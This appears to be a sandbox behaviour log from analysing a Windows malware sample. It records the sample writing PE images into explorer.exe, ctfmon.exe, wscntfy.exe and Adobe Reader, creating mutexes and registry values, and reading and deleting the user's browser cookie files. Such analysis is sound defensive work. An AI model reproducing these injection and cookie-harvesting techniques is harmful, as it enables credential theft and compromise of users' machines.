Section loaded Path: C:\WINDOWS\system32\winspool.drv Access: query and write and read and execute Type: image Baseaddress: 73000000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2599423286
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 360000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2599432134
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 3B0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2599538712
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 3B0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2599573165
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2599574087
Section loaded Path: C:\WINDOWS\system32\compstui.dll Access: read Type: commit Baseaddress: 2DA0000 Size: 229376 Protection: readonly Mapped to pid: own pid success or wait 2599591963
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 2DA0000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2599617565
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2599688611
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 3E0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2599759653
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 3E0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2599761443
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 3E0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2599762438
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 2E20000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2599820547
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 2ED0000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2599859152
Memory attributes changed PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Base: 400000 Length: 1000 New Protection: page read and write New Protection: page readonly success or wait 2613281912
Memory attributes changed PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Base: 400000 Length: 1000 New Protection: page readonly New Protection: page read and write success or wait 2613282566
Memory attributes changed PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Base: 40050A Length: 2446000 New Protection: page execute and read and write New Protection: page readonly success or wait 2613284023
Memory allocated PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Base: 2E40000 Length: 13FF9C Allocation Type: null Protection: page execute and read and write success or wait 2613305074
Memory allocated PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Base: 2ED0000 Length: 13FCA4 Allocation Type: null Protection: page execute and read and write success or wait 2613306821
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 2ED0000 Size: 8462336 Protection: readonly Mapped to pid: own pid object name not found 2613396149
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2613396858
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2613399093
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2613399692
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2613407378
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2613408974
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 771B0000 Size: 696320 Protection: read write Mapped to pid: own pid success or wait 2613418302
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: read Type: commit Baseaddress: 7FF0000 Size: 667648 Protection: readonly Mapped to pid: own pid success or wait 2613424299
Memory allocated PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Base: 7FF0000 Length: 13F8E0 Allocation Type: null Protection: page read and write success or wait 2613490031
Memory allocated PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Base: 7FF0000 Length: 13F8E4 Allocation Type: null Protection: page read and write success or wait 2613490175
File opened Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2613535421
Memory allocated PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Base: 2E60000 Length: 13F49C Allocation Type: null Protection: page read and write success or wait 2613535751
File read Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Offset: none Length: 257536 Value: 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 success or wait 2613535848
Mutant created Name: \BaseNamedObjects\Local\{DB295FE4-E198-6ACC-FB56-FD56EA1DDE44} success or wait 2613760787
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: 15807505 object name not found 2613761109
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: 19j6cd23 object name not found 2613761355
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 19j6cd23 Type: Binary Data: B2 D1 23 A5 17 5F 5B A1 9C B3 02 A6 DB 73 success or wait 2613761818
System info queried Type: ProcessInformation success or wait 2613766174
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 2E60000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2613768811
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-215D-B06D3016937F} success or wait 2613792520
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-6D5C-B06D7C17937F} success or wait 2613793777
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-055F-B06D1414937F} success or wait 2613794130
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-455F-B06D5414937F} success or wait 2613794487
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-8D5F-B06D9C14937F} success or wait 2613794824
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-915F-B06D8014937F} success or wait 2613828556
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-595E-B06D4815937F} success or wait 2613829159
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-F15E-B06DE015937F} success or wait 2615588806
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-0959-B06D1812937F} success or wait 2615591424
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-4D59-B06D5C12937F} success or wait 2615592438
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D159-B06DC012937F} success or wait 2615602810
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D558-B06DC413937F} success or wait 2615604896
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 1480000 Length: 13F1FC Allocation Type: null Protection: page execute and read and write success or wait 2615605420
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 1480000 Length: 217088 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 2629155736
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 14B01F0 Length: 4 Value: 00 00 00 00 success or wait 2629249434
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 14B0204 Length: 4 Value: 00 00 48 01 success or wait 2629331255
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 14B06C8 Length: 4 Value: B8 06 00 00 success or wait 2629363617
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 14B06CC Length: 4 Value: 00 06 00 00 success or wait 2629380448
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5B-B06DBC10937F} success or wait 2636239953
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-DD5D-B06DCC16937F} success or wait 2636243553
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5C-B06DBC17937F} success or wait 2636244419
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D95B-B06DC810937F} success or wait 2636245282
Memory allocated PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 1110000 Length: 13F1FC Allocation Type: null Protection: page execute and read and write success or wait 2636247027
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 1110000 Length: 217088 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 2638650109
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 11401F0 Length: 4 Value: 00 00 00 00 success or wait 2638683587
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 1140204 Length: 4 Value: 00 00 11 01 success or wait 2638725012
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 11406C8 Length: 4 Value: 44 01 00 00 success or wait 2638781388
Memory written PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 11406CC Length: 4 Value: A4 01 00 00 success or wait 2638795829
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615A-B06D7011937F} success or wait 2641994422
Memory allocated PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: AE0000 Length: 13F1FC Allocation Type: null Protection: page execute and read and write success or wait 2641997549
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: AE0000 Length: 217088 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 2645506657
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: B101F0 Length: 4 Value: 00 00 00 00 success or wait 2645540836
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: B10204 Length: 4 Value: 00 00 AE 00 success or wait 2645551740
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: B106C8 Length: 4 Value: 9C 00 00 00 success or wait 2645585818
Memory written PID: 1860 Path: C:\WINDOWS\system32\wscntfy.exe Base: B106CC Length: 4 Value: A0 00 00 00 success or wait 2645616180
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-7D5A-B06D6C11937F} success or wait 2664266623
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-555B-B06D4410937F} success or wait 2664267612
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-955B-B06D8410937F} object name exists 2664269055
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-E15B-B06DF010937F} success or wait 2664288211
Memory allocated PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 5FC0000 Length: 13F1FC Allocation Type: null Protection: page execute and read and write success or wait 2664288753
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 5FC0000 Length: 217088 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 2664354674
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 5FF01F0 Length: 4 Value: 00 00 00 00 success or wait 2664465851
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 5FF0204 Length: 4 Value: 00 00 FC 05 success or wait 2664564290
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 5FF06C8 Length: 4 Value: 9C 03 00 00 success or wait 2664635398
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 5FF06CC Length: 4 Value: 94 03 00 00 success or wait 2664673183
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615F-B06D7014937F} object name exists 2667094754
System info queried Type: ProcessInformation success or wait 2667096251
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 2E60000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2667106131
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-215D-B06D3016937F} success or wait 2667108734
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-6D5C-B06D7C17937F} success or wait 2667109982
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-055F-B06D1414937F} success or wait 2667110997
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-455F-B06D5414937F} success or wait 2667111908
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-8D5F-B06D9C14937F} success or wait 2667112810
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-915F-B06D8014937F} success or wait 2667113708
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-595E-B06D4815937F} success or wait 2667114661
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-F15E-B06DE015937F} success or wait 2667115599
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-0959-B06D1812937F} success or wait 2667116515
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-4D59-B06D5C12937F} success or wait 2667117454
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D159-B06DC012937F} success or wait 2667118371
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5B-B06DBC10937F} success or wait 2667119684
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-DD5D-B06DCC16937F} success or wait 2667120681
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5C-B06DBC17937F} success or wait 2667121857
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-7D5A-B06D6C11937F} success or wait 2667123677
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-555B-B06D4410937F} success or wait 2667124604
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-955B-B06D8410937F} object name exists 2667125968
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615F-B06D7014937F} object name exists 2667127262
Process terminated PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe success or wait 2667130418
Analysis File: explorer.exe PID: 1520 Parent PID: 488
+ Sections
+ General
Start time: 05:44:37
Start date: 08/12/2011
Path: C:\WINDOWS\explorer.exe
Commandline: C:\WINDOWS\Explorer.EXE
Imagebase: 0x1000000
File size: 1033728 bytes
MD5 hash: 12896823FB95BFB3DC9B46BCAEDC9923
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 149A4FF
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 149FD40
C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@addthis[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[4].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@bing[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@bing[4].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@disqus[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@dmtry[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@dmtry[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@exp.www.msn[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@oldapps[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@quantserve[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@questionmarket[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@twitter[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@www.msn[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
C:\Documents and Settings\Administrator\Cookies\administrator@www.msn[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1491C01
+ File created
File Path Access Attributes Options Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi read attributes and synchronize and generic read and generic write normal synchronous io non alert and non directory file success or wait 1 149F181
+ File deleted
File Path Completion Count Source Address
C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@addthis[1].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[4].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@bing[3].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@bing[4].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[2].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[3].txt success or wait 1 1491D4D
C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt success or wait 1 1491D4D
+ File renamed
Old File Path New File Path Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi unknown success or wait 1 149FDB7
+ File written
File Path Offset Length Value Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi none 5 EE BB DE 55 00 success or wait 1 149F349
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi none 4099 6F DD 26 BE 4C C1 4E 3F BE 2B 91 B4 8E 98 0F 2F E4 BB FE 5C 48 7B EA 9A 49 C9 0D 0B 21 4A 05 9D 73 2A A0 0A 6C D4 79 CD 75 A8 18 18 09 41 E5 AA AA 1F 1D 75 D6 51 CB 6A CB AC C2 C5 D1 1B 24 73 8C B2 0A 1D 43 F7 9C 9B 67 44 8D D5 59 3E 1C A1 79 19 A0 B9 29 C0 7C FA 8A 60 C3 8F BC DE B6 20 7A 39 6B 47 success or wait 1 149F362
+ File read
File Path Offset Length Value Completion Count Source Address
